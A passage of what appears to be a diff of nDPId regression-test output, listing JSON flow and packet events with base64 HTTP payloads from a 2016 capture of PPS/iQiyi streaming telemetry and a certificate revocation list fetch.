6IHpoLVRXDQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXAsIGRlZmxhdGUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wIChjb21wYXRpYmxlOyBNU0lFIDkuMDsgV2luZG93cyBOVCA2LjE7IFRyaWRlbnQvNS4wKQ0KSG9zdDogbXNnLnZpZGVvLnFpeWkuY29tDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -01174{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1122,"source":"pps.pcap","alias":"nDPId-test","flow_id":71,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353167288,"flow_last_seen":1467353167288,"flow_idle_time":7440000,"flow_min_l4_payload_len":640,"flow_max_l4_payload_len":640,"flow_tot_l4_payload_len":640,"flow_avg_l4_payload_len":640,"midstream":1,"thread_ts_msec":1467353167288,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"36.110.220.15","src_port":50498,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": 
{"hostname":"msg.video.qiyi.com","url":"msg.video.qiyi.com\/tmpstats.gif?type=recctplay20121226&usract=show&ppuid=-1&uid=aaoefdtqgfdepxc2tnv3piucgcb4eofn&event_id=4b0868920b0f8285320a9e00ee0369e5&cid=31&bkt=pps_c_zebra_main_default&area=pps_c_zebra&platform=2012&albumlist=470694500,471591300,465641000,472887100,471788100,473746300,471948300,473694600,472189500&aid=479531000&source=0,1,1,1,1,1,1,1,1&_=1467353167087","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident\/5.0)"}} -00647{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1123,"source":"pps.pcap","alias":"nDPId-test","flow_id":71,"flow_packet_id":2,"flow_last_seen":1467353167373,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":199,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":199,"pkt_l4_len":165,"thread_ts_msec":1467353167373,"pkt":"ABxCjnAxTF4M6gNlCABFAAC5WoJAAC4GvY4kbtwPwKhzCABQxUI6Bo8kfalyYFAYPAD9ZAAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG5naW54LzEuOC4wDQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA2OjA2IEdNVA0KQ29udGVudC1UeXBlOiBpbWFnZS9naWYNCkNvbnRlbnQtTGVuZ3RoOiAwDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQoNCg=="} -00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1125,"source":"pps.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353170523,"flow_last_seen":1467353170523,"flow_idle_time":7440000,"flow_min_l4_payload_len":1043,"flow_max_l4_payload_len":1043,"flow_tot_l4_payload_len":1043,"flow_avg_l4_payload_len":1043,"midstream":1,"thread_ts_msec":1467353170523,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"111.206.22.76","src_port":50499,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-01846{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1125,"source":"pps.pcap","alias":"nDPId-test","flow_id":72,"flow_packet_id":1,"flow_last_seen":1467353170523,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1097,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1097,"pkt_l4_len":1063,"thread_ts_msec":1467353170523,"pkt":"TF4M6gNlABxCjnAxCABFAAQ7HjFAAIAGHsHAqHMIb84WTMVDAFDdQoxSQH15t1AYQTfZKwAAR0VUIC9iP3Q9NSZwZj0yMDEmcD0xMSZwMT0xMTQmcm49MTQ2NzM1MzE2NzIyMSZhPTM0JmNsdD10dmcyMDE1X2JhaWtlQl9jb21tZW50X3Nob3cmdHlwZT1wYyZyZWY9bm9yZWYmdXJsPWh0dHAlM0EvL3ZvZGd1aWRlLnBwcy5pcWl5aS5jb20vcGFnZS5waHAlM0Z2ZXJzaW9uJTNENS4yLjE1LjIyNDAlMjNjbGFzcyUzRDIwMDAwMzcxOSUyNTI0JTI1MjQlMjUyNCUyNTI0MTgwOTMyMzAxJTI2ZW50aXR5aWQlM0Q0Nzk1MzEwMDAlMjZiYWlrZWlkJTNEMjAzMjI5NDkwJnU9YWFvZWZkdHFnZmRlcHhjMnRudjNwaXVjZ2NiNGVvZm4gSFRUUC8xLjENCkFjY2VwdDogKi8qDQpSZWZlcmVyOiBodHRwOi8vdm9kZ3VpZGUucHBzLmlxaXlpLmNvbS9wYWdlLnBocD92ZXJzaW9uPTUuMi4xNS4yMjQwDQpBY2NlcHQtTGFuZ3VhZ2U6IHpoLVRXDQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXAsIGRlZmxhdGUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wIChjb21wYXRpYmxlOyBNU0lFIDkuMDsgV2luZG93cyBOVCA2LjE7IFRyaWRlbnQvNS4wKQ0KSG9zdDogbXNnLmlxaXlpLmNvbQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KQ29va2llOiBwcHNfY2xpZW50X3ZlcjI9NS4yLjE1LjIyNDA7IFQwMDQwND00ZTNhZTQxNWE1ODQ3NDhhYzlhYTMxNjI4ZjM5ZDFlODsgX3Bwc19pdmk9Vms0OU1UWXdOVEExTGFXL3BQbWhSejgvUDZUYXBFZW11RDgvcE0rd1pqOHRwTFd4M3pnd3Bsby9wR2FvY1NaV1VEMHhKbFpEUFQ4L1B6OCtwTFd4M3pnd3Bsby9wR2FvY1NaV1NqMHRNU1pXVXoxV0psWkVQU1pXVkZ0QlhUMHlNVGMxSmxaTlBTWldWajAxTGpJdU1UVXVNakkwTUNaV1ZUMW9kSFJ3T2k4dmQzZDNMbWx4YVhscExtTnZiUzkyWHpFNWNuSnNkblY0YkdjdWFIUnRiQT09OyBRQzAwNj11NTQ5dnB6MTBsOWZrYXR1bTRhbHc0YnA7IFFDMDA4PTE0NjY2NDU4MTYuMTQ2NjY0NTgxNi4xNDY2NjQ1ODE2LjE7IEhtX2x2dF81M2I3Mzc0YTYzYzM3NDgzZTVkZDk3ZDc4ZDliYjM2ZT0xNDY2NjQ1ODE3OyBRQzAwNT1hYW9lZmR0cWdmZGVweGMydG52M3BpdWNnY2I0ZW9mbg0KDQo="} 
-01116{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1125,"source":"pps.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353170523,"flow_last_seen":1467353170523,"flow_idle_time":7440000,"flow_min_l4_payload_len":1043,"flow_max_l4_payload_len":1043,"flow_tot_l4_payload_len":1043,"flow_avg_l4_payload_len":1043,"midstream":1,"thread_ts_msec":1467353170523,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"111.206.22.76","src_port":50499,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.PPStream","breed":"Fun","category":"Streaming"},"http": {"hostname":"msg.iqiyi.com","url":"msg.iqiyi.com\/b?t=5&pf=201&p=11&p1=114&rn=1467353167221&a=34&clt=tvg2015_baikeB_comment_show&type=pc&ref=noref&url=http%3A\/\/vodguide.pps.iqiyi.com\/page.php%3Fversion%3D5.2.15.2240%23class%3D200003719%2524%2524%2524%2524180932301%26entityid%3D479531000%26baikeid%3D203229490&u=aaoefdtqgfdepxc2tnv3piucgcb4eofn","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident\/5.0)"}} -00648{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1126,"source":"pps.pcap","alias":"nDPId-test","flow_id":72,"flow_packet_id":2,"flow_last_seen":1467353171307,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":199,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":199,"pkt_l4_len":165,"thread_ts_msec":1467353171307,"pkt":"ABxCjnAxTF4M6gNlCABFAAC5FgtAADMGd2lvzhZMwKhzCABQxUNAfXm33UKQZVAYACEI\/gAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG5naW54LzEuOC4wDQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA2OjEwIEdNVA0KQ29udGVudC1UeXBlOiB0ZXh0L2h0bWwNCkNvbnRlbnQtTGVuZ3RoOiAwDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQoNCg=="} 
-00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1127,"source":"pps.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353172446,"flow_last_seen":1467353172446,"flow_idle_time":7440000,"flow_min_l4_payload_len":235,"flow_max_l4_payload_len":235,"flow_tot_l4_payload_len":235,"flow_avg_l4_payload_len":235,"midstream":1,"thread_ts_msec":1467353172446,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"23.41.133.163","src_port":50500,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00767{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1127,"source":"pps.pcap","alias":"nDPId-test","flow_id":73,"flow_packet_id":1,"flow_last_seen":1467353172446,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":289,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":289,"pkt_l4_len":255,"thread_ts_msec":1467353172446,"pkt":"TF4M6gNlABxCjnAxCABFAAETH7ZAAIAGCbLAqHMIFymFo8VEAFBenvyU0fNBYlAYAQQxqAAAR0VUIC9wY2EzLWc1LmNybCBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KQWNjZXB0OiAqLyoNCklmLU1vZGlmaWVkLVNpbmNlOiBUaHUsIDI0IE1hciAyMDE2IDE3OjQwOjA1IEdNVA0KSWYtTm9uZS1NYXRjaDogIjE3MjE5NjllNzMyYmNmZGRhNGQ4NWMxNjM5MGViYTcwOjE0NTg4NDI1OTciDQpVc2VyLUFnZW50OiBNaWNyb3NvZnQtQ3J5cHRvQVBJLzYuMQ0KSG9zdDogczEuc3ltY2IuY29tDQoNCg=="} -00775{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1127,"source":"pps.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353172446,"flow_last_seen":1467353172446,"flow_idle_time":7440000,"flow_min_l4_payload_len":235,"flow_max_l4_payload_len":235,"flow_tot_l4_payload_len":235,"flow_avg_l4_payload_len":235,"midstream":1,"thread_ts_msec":1467353172446,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"23.41.133.163","src_port":50500,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"s1.symcb.com","url":"s1.symcb.com\/pca3-g5.crl","code":0,"content_type":"","user_agent":"Microsoft-CryptoAPI\/6.1"}} -01506{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1128,"source":"pps.pcap","alias":"nDPId-test","flow_id":73,"flow_packet_id":2,"flow_last_seen":1467353172450,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":839,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":839,"pkt_l4_len":805,"thread_ts_msec":1467353172450,"pkt":"ABxCjnAxTF4M6gNlCABFAAM59KBAADkGeaEXKYWjwKhzCABQxUTR80FiXp79f1AYA7JdXgAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IEFwYWNoZQ0KRVRhZzogIjM2ZGFiMGNkZDA1ODVlZmNmMjhlYjY3NzRhZWVlOTJhOjE0NjY3OTc4MTQiDQpMYXN0LU1vZGlmaWVkOiBGcmksIDI0IEp1biAyMDE2IDE5OjUwOjE0IEdNVA0KRGF0ZTogRnJpLCAwMSBKdWwgMjAxNiAwNjowNjoxMSBHTVQNCkNvbnRlbnQtTGVuZ3RoOiA1MzMNCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCkNvbnRlbnQtVHlwZTogYXBwbGljYXRpb24vcGtpeC1jcmwNCg0KMIICETCB+jANBgkqhkiG9w0BAQUFADCByjELMAkGA1UEBhMCVVMxFzAVBgNVBAoTDlZlcmlTaWduLCBJbmMuMR8wHQYDVQQLExZWZXJpU2lnbiBUcnVzdCBOZXR3b3JrMTowOAYDVQQLEzEoYykgMjAwNiBWZXJpU2lnbiwgSW5jLiAtIEZvciBhdXRob3JpemVkIHVzZSBvbmx5MUUwQwYDVQQDEzxWZXJpU2lnbiBDbGFzcyAzIFB1YmxpYyBQcmltYXJ5IENlcnRpZmljYXRpb24gQXV0aG9yaXR5IC0gRzUXDTE2MDYyMzAwMDAwMFoXDTE2MDkzMDIzNTk1OVowDQYJKoZIhvcNAQEFBQADggEBAEI97eVcH1DiB1\/0Bno6J+K8HusVe3cUvr5+fyScH1zXRcf7c5djWYgN+SuML4v70NdV\/FuJwb2d1nTAPxF1qboQaHggi98zdzXj8RwrHgS5mm8yRgjh5Xn7nIaC171csZuQguJ7tmZuJ7r76UMkne0JyJ14wsSf90xX+g\/a\/dFyP90Y6ni5xSPgpc8d3Zgw\/EfU0UQm\/T+f09jhD1\/1X6BOBM7pQUZMpb0wu+RThkQxkoU7zdqSaSWoF1RKiDChBGCnoysqx+p1d9U16eVsZvZ0VQEVpSaXicfzrXu+tMxjeZnFuPSglD2NZ6ZxRQtvm2pR35dtCeWkmxI8I6zBG3M="} 
-00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1129,"source":"pps.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353172912,"flow_last_seen":1467353172912,"flow_idle_time":7440000,"flow_min_l4_payload_len":892,"flow_max_l4_payload_len":892,"flow_tot_l4_payload_len":892,"flow_avg_l4_payload_len":892,"midstream":1,"thread_ts_msec":1467353172912,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50501,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -01644{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1129,"source":"pps.pcap","alias":"nDPId-test","flow_id":74,"flow_packet_id":1,"flow_last_seen":1467353172912,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":946,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":946,"pkt_l4_len":912,"thread_ts_msec":1467353172912,"pkt":"TF4M6gNlABxCjnAxCABFAAOkIBFAAIAGyjnAqHMIymwO7MVFAFDpA4X9\/kkVyVAYQTfM+gAAR0VUIC9jcDIuZ2lmP2E9NGUzYWU0MTVhNTg0NzQ4YWM5YWEzMTYyOGYzOWQxZTgmYWk9JmFzPTE6NDU6MjN8NDUmYXY9NC4xMC4wMDQmYj0xODA5MzIzMDEmYz0zMSZjdD01MDAwMDAwOTIzNDQ3JmQ9MjE3NSZkaT0mZHA9NzEwMDAwMDEmZT1jNDg4OWU2NGFkOWQ5ZWViOWZmNDM4OTEwODUwYzQ0MiZlYz0mZW09JmZpPSZnPTAmbD1NVEU0TGpFMk15NDRMamt3Jm1rPSZudz0mb2Q9NTAwMDAwMDg1NDkzNCZvaT0mcD1hJnBwPSZyYz0mcmQ9JnJpPSZzPTE0NjczNTMxNzIwNTEmc2g9JnNxPSZzdz0mdD0xcSZ1PTBfYWFvZWZkdHFnZmRlcHhjMnRudjNwaXVjZ2NiNGVvZm4mdj00Nzk1MzEwMDAmdnY9NS4yLjE1LjIyNDAmeD0meT1xY18xMDAwMDFfMTAwMTQwIEhUVFAvMS4xDQpBY2NlcHQtTGFuZ3VhZ2U6IHpoLUNODQpSZWZlcmVyOiBodHRwOi8vd3d3LmlxaXlpLmNvbS9jb21tb24vZmxhc2hwbGF5ZXIvMjAxNDA5MjQvTWFpblBsYXllcl81XzJfM19jM18yXzFfNi5zd2YNCnF5aWQ6IGFhb2VmZHRxZ2ZkZXB4YzJ0bnYzcGl1Y2djYjRlb2ZuDQpxeXBpZDogXzIwMTINCnF5cGxhdGZvcm06IDAtMg0KeC1mbGFzaC12ZXJzaW9uOiAxMiwwLDAsNzANCkFjY2VwdDogKi8qDQpQcmFnbWE6IG5vLWNhY2hlDQpDYWNoZS1Db250cm9sOiBuby1jYWNoZQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS80LjAgKGNvbXBhdGlibGU7IE1TSUU
gOC4wOyBXaW5kb3dzIE5UIDYuMTsgV09XNjQ7IFRyaWRlbnQvNC4wOyBTTENDMjsgLk5FVCBDTFIgMi4wLjUwNzI3OyAuTkVUIENMUiAzLjUuMzA3Mjk7IC5ORVQgQ0xSIDMuMC4zMDcyOTsgTWVkaWEgQ2VudGVyIFBDIDYuMCkvUVktUGxheWVyLVdpbmRvd3MvMi4wLjEwMg0KSG9zdDogbXNnLjcxLmFtDQoNCg=="} -01296{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1129,"source":"pps.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353172912,"flow_last_seen":1467353172912,"flow_idle_time":7440000,"flow_min_l4_payload_len":892,"flow_max_l4_payload_len":892,"flow_tot_l4_payload_len":892,"flow_avg_l4_payload_len":892,"midstream":1,"thread_ts_msec":1467353172912,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50501,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"msg.71.am","url":"msg.71.am\/cp2.gif?a=4e3ae415a584748ac9aa31628f39d1e8&ai=&as=1:45:23|45&av=4.10.004&b=180932301&c=31&ct=5000000923447&d=2175&di=&dp=71000001&e=c4889e64ad9d9eeb9ff438910850c442&ec=&em=&fi=&g=0&l=MTE4LjE2My44Ljkw&mk=&nw=&od=5000000854934&oi=&p=a&pp=&rc=&rd=&ri=&s=1467353172051&sh=&sq=&sw=&t=1q&u=0_aaoefdtqgfdepxc2tnv3piucgcb4eofn&v=479531000&vv=5.2.15.2240&x=&y=qc_100001_100140","code":0,"content_type":"","user_agent":"Mozilla\/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident\/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)\/QY-Player-Windows\/2.0.102"}} 
-00647{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1130,"source":"pps.pcap","alias":"nDPId-test","flow_id":74,"flow_packet_id":2,"flow_last_seen":1467353173018,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":199,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":199,"pkt_l4_len":165,"thread_ts_msec":1467353173018,"pkt":"ABxCjnAxTF4M6gNlCABFAAC5BZNAADMGNKPKbA7swKhzCABQxUX+SRXJ6QOJeVAYACCXCgAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG5naW54LzEuOC4wDQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA2OjEyIEdNVA0KQ29udGVudC1UeXBlOiBpbWFnZS9naWYNCkNvbnRlbnQtTGVuZ3RoOiAwDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQoNCg=="} +00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1122,"source":"pps.pcap","alias":"nDPId-test","flow_id":71,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353167288,"flow_last_seen":1467353167288,"flow_idle_time":7560000,"flow_min_l4_payload_len":640,"flow_max_l4_payload_len":640,"flow_tot_l4_payload_len":640,"flow_avg_l4_payload_len":640,"midstream":1,"thread_ts_msec":1467353167288,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"36.110.220.15","src_port":50498,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+01311{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1122,"source":"pps.pcap","alias":"nDPId-test","flow_id":71,"flow_packet_id":1,"flow_last_seen":1467353167288,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":694,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":694,"pkt_l4_len":660,"thread_ts_msec":1467353167288,"pkt":"TF4M6gNlABxCjnAxCABFAAKoG9BAAIAGqFHAqHMIJG7cD8VCAFB9qW\/gOgaPJFAY\/\/DRFwAAR0VUIC90bXBzdGF0cy5naWY\/dHlwZT1yZWNjdHBsYXkyMDEyMTIyNiZ1c3JhY3Q9c2hvdyZwcHVpZD0tMSZ1aWQ9YWFvZWZkdHFnZmRlcHhjMnRudjNwaXVjZ2NiNGVvZm4mZXZlbnRfaWQ9NGIwODY4OTIwYjBmODI4NTMyMGE5ZTAwZWUwMzY5ZTUmY2lkPTMxJmJrdD1wcHNfY196ZWJyYV9tYWluX2RlZmF1bHQmYXJlYT1wcHNfY196ZWJyYSZwbGF0Zm9ybT0yMDEyJmFsYnVtbGlzdD00NzA2OTQ1MDAsNDcxNTkxMzAwLDQ2NTY0MTAwMCw0NzI4ODcxMDAsNDcxNzg4MTAwLDQ3Mzc0NjMwMCw0NzE5NDgzMDAsNDczNjk0NjAwLDQ3MjE4OTUwMCZhaWQ9NDc5NTMxMDAwJnNvdXJjZT0wLDEsMSwxLDEsMSwxLDEsMSZfPTE0NjczNTMxNjcwODcgSFRUUC8xLjENCkFjY2VwdDogKi8qDQpSZWZlcmVyOiBodHRwOi8vdm9kZ3VpZGUucHBzLmlxaXlpLmNvbS9wYWdlLnBocD92ZXJzaW9uPTUuMi4xNS4yMjQwDQpBY2NlcHQtTGFuZ3VhZ2U6IHpoLVRXDQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXAsIGRlZmxhdGUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wIChjb21wYXRpYmxlOyBNU0lFIDkuMDsgV2luZG93cyBOVCA2LjE7IFRyaWRlbnQvNS4wKQ0KSG9zdDogbXNnLnZpZGVvLnFpeWkuY29tDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} +01174{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1122,"source":"pps.pcap","alias":"nDPId-test","flow_id":71,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353167288,"flow_last_seen":1467353167288,"flow_idle_time":7560000,"flow_min_l4_payload_len":640,"flow_max_l4_payload_len":640,"flow_tot_l4_payload_len":640,"flow_avg_l4_payload_len":640,"midstream":1,"thread_ts_msec":1467353167288,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"36.110.220.15","src_port":50498,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": 
{"hostname":"msg.video.qiyi.com","url":"msg.video.qiyi.com\/tmpstats.gif?type=recctplay20121226&usract=show&ppuid=-1&uid=aaoefdtqgfdepxc2tnv3piucgcb4eofn&event_id=4b0868920b0f8285320a9e00ee0369e5&cid=31&bkt=pps_c_zebra_main_default&area=pps_c_zebra&platform=2012&albumlist=470694500,471591300,465641000,472887100,471788100,473746300,471948300,473694600,472189500&aid=479531000&source=0,1,1,1,1,1,1,1,1&_=1467353167087","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident\/5.0)"}} +00647{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1123,"source":"pps.pcap","alias":"nDPId-test","flow_id":71,"flow_packet_id":2,"flow_last_seen":1467353167373,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":199,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":199,"pkt_l4_len":165,"thread_ts_msec":1467353167373,"pkt":"ABxCjnAxTF4M6gNlCABFAAC5WoJAAC4GvY4kbtwPwKhzCABQxUI6Bo8kfalyYFAYPAD9ZAAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG5naW54LzEuOC4wDQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA2OjA2IEdNVA0KQ29udGVudC1UeXBlOiBpbWFnZS9naWYNCkNvbnRlbnQtTGVuZ3RoOiAwDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQoNCg=="} +00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1125,"source":"pps.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353170523,"flow_last_seen":1467353170523,"flow_idle_time":7560000,"flow_min_l4_payload_len":1043,"flow_max_l4_payload_len":1043,"flow_tot_l4_payload_len":1043,"flow_avg_l4_payload_len":1043,"midstream":1,"thread_ts_msec":1467353170523,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"111.206.22.76","src_port":50499,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+01846{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1125,"source":"pps.pcap","alias":"nDPId-test","flow_id":72,"flow_packet_id":1,"flow_last_seen":1467353170523,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1097,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1097,"pkt_l4_len":1063,"thread_ts_msec":1467353170523,"pkt":"TF4M6gNlABxCjnAxCABFAAQ7HjFAAIAGHsHAqHMIb84WTMVDAFDdQoxSQH15t1AYQTfZKwAAR0VUIC9iP3Q9NSZwZj0yMDEmcD0xMSZwMT0xMTQmcm49MTQ2NzM1MzE2NzIyMSZhPTM0JmNsdD10dmcyMDE1X2JhaWtlQl9jb21tZW50X3Nob3cmdHlwZT1wYyZyZWY9bm9yZWYmdXJsPWh0dHAlM0EvL3ZvZGd1aWRlLnBwcy5pcWl5aS5jb20vcGFnZS5waHAlM0Z2ZXJzaW9uJTNENS4yLjE1LjIyNDAlMjNjbGFzcyUzRDIwMDAwMzcxOSUyNTI0JTI1MjQlMjUyNCUyNTI0MTgwOTMyMzAxJTI2ZW50aXR5aWQlM0Q0Nzk1MzEwMDAlMjZiYWlrZWlkJTNEMjAzMjI5NDkwJnU9YWFvZWZkdHFnZmRlcHhjMnRudjNwaXVjZ2NiNGVvZm4gSFRUUC8xLjENCkFjY2VwdDogKi8qDQpSZWZlcmVyOiBodHRwOi8vdm9kZ3VpZGUucHBzLmlxaXlpLmNvbS9wYWdlLnBocD92ZXJzaW9uPTUuMi4xNS4yMjQwDQpBY2NlcHQtTGFuZ3VhZ2U6IHpoLVRXDQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXAsIGRlZmxhdGUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wIChjb21wYXRpYmxlOyBNU0lFIDkuMDsgV2luZG93cyBOVCA2LjE7IFRyaWRlbnQvNS4wKQ0KSG9zdDogbXNnLmlxaXlpLmNvbQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KQ29va2llOiBwcHNfY2xpZW50X3ZlcjI9NS4yLjE1LjIyNDA7IFQwMDQwND00ZTNhZTQxNWE1ODQ3NDhhYzlhYTMxNjI4ZjM5ZDFlODsgX3Bwc19pdmk9Vms0OU1UWXdOVEExTGFXL3BQbWhSejgvUDZUYXBFZW11RDgvcE0rd1pqOHRwTFd4M3pnd3Bsby9wR2FvY1NaV1VEMHhKbFpEUFQ4L1B6OCtwTFd4M3pnd3Bsby9wR2FvY1NaV1NqMHRNU1pXVXoxV0psWkVQU1pXVkZ0QlhUMHlNVGMxSmxaTlBTWldWajAxTGpJdU1UVXVNakkwTUNaV1ZUMW9kSFJ3T2k4dmQzZDNMbWx4YVhscExtTnZiUzkyWHpFNWNuSnNkblY0YkdjdWFIUnRiQT09OyBRQzAwNj11NTQ5dnB6MTBsOWZrYXR1bTRhbHc0YnA7IFFDMDA4PTE0NjY2NDU4MTYuMTQ2NjY0NTgxNi4xNDY2NjQ1ODE2LjE7IEhtX2x2dF81M2I3Mzc0YTYzYzM3NDgzZTVkZDk3ZDc4ZDliYjM2ZT0xNDY2NjQ1ODE3OyBRQzAwNT1hYW9lZmR0cWdmZGVweGMydG52M3BpdWNnY2I0ZW9mbg0KDQo="} 
